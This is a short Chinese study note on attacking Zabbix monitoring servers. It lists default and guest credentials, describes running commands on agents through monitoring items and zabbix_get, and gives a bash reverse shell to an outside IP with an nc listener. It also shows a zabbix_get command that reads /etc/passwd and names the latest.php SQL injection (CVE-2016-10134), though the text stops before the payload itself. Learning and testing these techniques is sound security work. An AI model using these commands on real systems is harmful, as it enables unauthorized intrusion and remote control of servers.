网络安全Day07
zabbix Zabbix配置不当安全事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627 京东某站shell直入jae内网物理机内核版本过低 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349 Zabbix弱口令利用 zabbix默认的口令为Admin:zabbix,以及存在guest密码为空 Zabbix server可以远程在agent的机器上执行任意命令 建立监控项 zabbix_get命令调用 登录后可以在后台自定义脚本,执行命令。 默认安装后是开启了guest账户的,如果没有禁止,可以通过guest账户登录,查看信息 这个模块是agent自带的,获取服务器shell,获取root权限。 监控项: bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1 nc -lvp 6666 zabbix_get命令调用: zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]' Zabbix注入 latest.php SQL注入漏洞(CVE-2016-10134) Payload: latest.php